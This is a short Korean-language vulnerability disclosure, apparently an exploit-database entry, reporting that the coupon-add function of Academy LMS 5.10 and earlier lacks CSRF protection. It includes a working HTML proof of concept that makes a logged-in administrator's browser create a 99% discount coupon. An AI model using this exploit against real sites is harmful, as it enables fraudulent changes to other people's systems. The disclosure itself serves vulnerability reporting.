
Academy LMS <= 5.10 CSRF
Academy LMS <= 5.10 CSRF
Academy LMS는 사람들이 강좌를 생성 및 광고할 수 있는 애플리케이션입니다. 쿠폰 추가 기능은 CSRF에 취약합니다. 이 공격을 방어할 수 있는 토큰이 없기 때문입니다.
개념 증명의 첫 단계는 관리자 사용자로 플랫폼에 인증하는 것입니다.
그런 다음 취약점을 악용하는 코드가 포함된 페이지에 접속하면, 새로운 쿠폰이 자동으로 생성되는 것을 확인할 수 있습니다.
악용에 사용된 코드:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/admin/coupons/add" method="POST">
<input type="hidden" name="code" value="vinix" />
<input type="hidden" name="discount_percentage" value="99" />
<input type="hidden" name="expiry_date" value="12/11/2022" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>